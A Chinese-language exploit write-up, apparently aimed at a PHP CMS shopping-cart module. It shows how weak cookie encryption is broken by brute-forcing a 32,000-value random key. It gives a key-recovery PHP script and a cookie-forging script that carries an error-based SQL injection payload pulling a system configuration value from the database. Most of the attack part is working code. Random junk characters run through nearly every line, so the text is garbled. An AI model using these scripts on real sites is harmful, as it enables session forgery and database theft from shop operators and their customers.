www.xxx.com/plus/search.php?keyword=
8 R0 S- o2 S5 s# l3 c" x$ w9 ^# U在 include/shopcar.class.php中
7 s, U6 X9 u- Z$ w$ D先看一下这个shopcar类是如何生成cookie的
+ O6 ?' Q6 q) R1 h M239 function saveCookie($key,$value)6 C4 X; S8 _4 h3 n: L' q
240 {
: w0 Q5 n/ L |8 P241 if(is_array($value))9 V8 n. y6 P; O6 D+ `7 b9 H
242 {
{, p: ?: z( J0 T9 W243 $value = $this->enCrypt($this->enCode($value));% {+ V$ s$ s8 J) P l
244 }
( [( U6 U* k3 X8 q, T245 else
! [$ W) W# }" h/ q5 B2 \246 {# s2 ?, b; K7 G/ H3 M
247 $value = $this->enCrypt($value);0 n# |4 D3 E# V' {) l3 r/ f j% ~
248 }0 S+ z( ?* M" Y7 \& p
249 setcookie($key,$value,time()+36000,’/');7 W( z% O$ [' m9 _/ m* o
250 }
# `+ }3 Y' R% D$ h' r b% @简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
7 n" G* J* P ^% R8 l. }186 function enCrypt($txt)( c' w2 n$ T9 y' }! c% J7 S9 m1 }
187 {
( p9 d. I; f: H+ |: c3 ]188 srand((double)microtime() * 1000000);! N4 f$ w. X) v9 w3 q
189 $encrypt_key = md5(rand(0, 32000));( V) X' V4 ]+ N: \
190 $ctr = 0;
* v; r( @( |/ [1 @, k0 y) ]$ i( ^' P191 $tmp = ”;
/ ]( z7 A; A9 D% f192 for($i = 0; $i < strlen($txt); $i++)% r, S1 U4 z- y" {' q, ~
193 {
0 X+ } m' _* E6 o. J- m. r0 Y# Y194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, Q; U8 u/ a$ }- a3 C195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. \: J. C" F# U) p5 b9 a196 }: X& f! S# A. b4 e, o& ] g9 V# f
197 return base64_encode($this->setKey($tmp));
. [0 p3 n% [& E, d" x/ [198 } X$ F) S* R" M" m0 g; \; d
213 function setKey($txt)
* N8 O ~$ O( {+ o2 z214 {
" i! u; w- K R+ `215 global $cfg_cookie_encode; a& F* w t4 G n/ ? l. J% ?7 V
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));% Y) p" i u% i' P
217 $ctr = 0;
0 A$ p7 r0 k' k1 a7 G8 m: g218 $tmp = ”;
( h# J) [- |. Z& U0 Q/ C219 for($i = 0; $i < strlen($txt); $i++)7 v. ]2 _7 a# T) [ q
220 {
5 n( E2 q; \, }: s) M: H' O221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, \( _7 T* B! t8 r; y; f& B222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" r! E4 s. k' Q9 s3 L
223 }$ W+ n9 W; M- e" u
224 return $tmp;; t7 Q; L/ j: D/ T& [4 f
225 }
( O: A0 D1 l+ F/ k+ ?& denCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
( t9 \2 N' \7 p' r# s+ k然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
, F. Q( v- X0 ^3 S具体代码如下:$ T. h( D: A5 ~( w: ^! B' I
<?php
& N. s% K2 Z. l$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here- H" v( N$ s. L; G; B4 m# ]
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here2 n+ I$ }6 n. ~: D
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
' X4 F$ p* \+ Gfunction reStrCode($code,$string)' a& ]3 k& [3 D# Z# Y% o0 E. x
{
3 B& |& f3 e. X- X7 z$code = base64_decode($code);1 h& {% D3 n$ q, w
$key = “”;
b, r3 Q# O2 c$ j: O1 ?3 efor($i=0 ; $i<32 ; $i++)- ], l' V) R8 A. C5 \
{- x8 |) s' B: q1 F
$key .= $string[$i] ^ $code[$i];
! k, ~1 _2 p8 ^# S; S}& V4 m+ d7 u% F. p$ D" s) x
return $key;
) H) M! c! g7 J; M8 Q7 {& \}6 s$ p( r$ J0 u) H
function getKeys($cookie,$plantxt)7 p$ p1 k9 c8 {' F
{
5 K& S3 R0 S. {3 z$tmp = $cookie;) ~0 |3 s0 M5 m' \% O7 _5 j) p
$results = array();- P9 P- Y9 n4 m$ f6 L- z
for($j=0 ; $j < 32000; $j++)- d: P4 C+ O4 {% l. i
{
8 y. x" z) e% h2 v U( ?8 [" p2 J! v5 U/ `6 ~% ?; U$ {
$txt = $plantxt;
0 Z/ b" p. ^. l2 |' B: g$ctr = 0;
0 k/ M' i" ~0 U8 X$ v8 p$tmp = ”;
7 `7 ]; y _0 U; p6 J& Q$encrypt_key = md5($j);! N7 @1 C. U% p5 j, \
for($i =0; $i < strlen($txt); $i ++)5 ~/ l) ]) E6 t6 W' ?4 g1 |- Z
{2 S: Q1 a8 r' P: B! S+ m
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% i: A9 G$ G6 P0 j, I3 q4 _) q8 `$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
! J% P; d. _9 @ F}1 x* r P2 j4 y9 R, k3 x& V0 ~
$string = $tmp;
4 @( a' \6 K2 N, ?8 k# \3 f$code = $cookie;
' ?% F, K7 _( N" C4 a1 l. i, h3 K$result = reStrCode($code,$string);/ U: S5 y& N+ {- K, }1 n, M8 ~
if(eregi(‘^[a-z0-9]+$’,$result))
5 P" b3 n! w2 D( Q' Q{, O, o$ U( p% R5 m) E
echo $result.”\n”;
6 K% X/ U5 o- t5 l" N% p$ ?# t/ M6 ^$results[] = $result;7 Q# X. ]- s H1 @: E+ i
}
$ g8 G) ? N# Q3 m}7 D1 s, |* k; l$ N9 W- {) R
return $results;' j8 b0 \6 {1 Z2 L% e
}6 H6 } C; s/ i
$results1 = getKeys($cookie1,$plantxt); b" {9 R! R( f1 j2 B0 {
$results2 = getKeys($cookie2,$plantxt);
- M$ j7 o3 I0 I8 Q6 f/ @! tprint “\n——————–real key————————–\n”;% {% J! C+ Z, w$ c
foreach($results1 as $test1)
( J8 i2 R9 `1 N% F2 V% {{+ N! h( R) C, V: o
foreach($results2 as $test2)
% V; N% b. E. H+ w{
6 H7 x4 {7 n3 kif($test1 == $test2)
+ f j5 Y' k, d* @7 w{! M+ T- b4 G! j) a7 K3 E, k) U
echo $test1.”\n”;% p! I4 n0 [0 y! V* B+ x4 I- |5 _
}7 e, o8 R; R+ U5 s3 w( U3 S9 |
}
1 S+ x7 p/ W" E2 W( y5 U$ R}
+ a0 \" s& [7 W/ q2 U?>
. @3 U8 Y* H! b* gcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
1 D6 ^( ^* k. }' a7 Hplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
. c$ J P; L' Q8 n9 o然后推算出md5(strtolower($cfg_cookie_encode)) t" _3 @# D4 j ?! B, x0 ]: X
得到这个key之后,我们就可以构造任意购物车的cookie. b1 `- L& [. V, s
接着看" W3 n+ ?7 ?% _' h7 F5 Z5 T4 L
20 class MemberShops$ q. V, c. r) h
21 {. u+ M( e5 }- ` m
22 var $OrdersId;* ]% Q! [8 U7 n( O2 Z) g9 d; B
23 var $productsId;
" i8 s+ K7 R o24- b5 t9 R9 `+ v, b: p7 o
25 function __construct()
1 Z& N C, W6 X2 b' i. y26 {
; F1 K8 j/ }9 C! z+ X2 |7 Q27 $this->OrdersId = $this->getCookie(“OrdersId”);
! j5 R9 V* O- M* h6 n! q28 if(empty($this->OrdersId))( v) K4 T. w3 i; m" L+ g/ h
29 {) ~- l, C8 y5 e) V
30 $this->OrdersId = $this->MakeOrders();
) q" Q% F q: c$ Q! v- g5 b5 H31 }& {' r( d/ r* a! C3 x" U
32 }
; z7 I7 x: G4 L6 v( `: C# B0 O5 t( p发现OrderId是从cookie里面获取的
. m- A, }. ?4 O9 \/ l) e/ {然后
" \# l9 b. \# \# O( F/plus/carbuyaction.php中的
9 e4 y: {# P; x h' U6 W29 $cart = new MemberShops();) I& n: Q6 I9 [
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
5 F! x/ g: b' x- c; H- N; n……
- Y5 r- J" a" p. l; L2 P5 e173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
4 D: g) ^+ R: E# k7 O接着我们就可以注入了+ H* M* ^9 D" F, i
通过利用下面代码生成cookie:
5 R2 |# L/ o i! c H<?php7 ?' m4 X6 L' I- o# c
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
8 {, j. q9 j9 |2 X% W' e% T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here& Z& r5 \7 r7 V* c q6 E
function setKey($txt)
: G) A1 I% S1 E$ h{
- ~) j5 F7 {8 s. D- l1 H( N3 y" xglobal $encrypt_key;6 p( z$ U2 b2 S& D4 u* L9 L3 b S9 m+ z
$ctr = 0;: H0 u% F6 L* P8 Z! s
$tmp = ”;/ ? R+ C! s8 l1 [
for($i = 0; $i < strlen($txt); $i++)6 k1 B1 s& Z: J, k
{
3 Y. c+ K" W( G5 L: \: T7 x0 D$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% v' U% Y; I& l1 _) H4 h
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
/ O; J3 L) l% g& K( T1 \}
' w5 P2 Q6 r0 ]: sreturn $tmp;
+ W& S1 X6 {7 o L" u}% t1 o- \$ O3 a, B" u( `' h: g
function enCrypt($txt)
& o! X, `4 L6 i4 D/ F( Y0 W{) g9 r; z% Z1 k) q
srand((double)microtime() * 1000000);1 F7 z1 F9 k8 p" b6 S
$encrypt_key = md5(rand(0, 32000));. ^# F/ W- C8 t1 D7 ~, J( r
$ctr = 0;
& Z) I5 ~: \# `! T$ K9 |7 F X$tmp = ”;
" } X0 W: c! N# M+ Mfor($i = 0; $i < strlen($txt); $i++) O* V: a6 ?0 k7 i, @
{
! p4 g! `1 t/ _- z! H, n! o: g$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, A: t9 T5 B u V9 T
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 I/ Q" w) r0 C. [}
* r( O! D. W& J& a& `% f' K$ b% oreturn base64_encode(setKey($tmp));% a+ P' U% q# B# f; y, x
}, t( s) g5 _* l( W; V5 U& F# \
for($dest =0;$dest = enCrypt($txt);)
( V1 |3 l6 {0 y9 x& c{
) L# j: Y& C5 r& J: u, x7 _if(!strpos($dest,’+'))
, I# H( j" y3 L" f5 c# g{7 k7 Q ~6 x0 H9 H! d0 m, k
break;& [4 b. L' p( O' U7 V! L
}
4 l# k' P: w0 E7 u- l}+ X) {% W( w" F: H5 m' g6 b9 h8 L& D
echo $dest.”\n”;3 Y, N* D. V! C2 r6 E& p
?>! r% A* V( K" `$ f
# g; _- f# ~* [* ^; g4 d2 F9 L |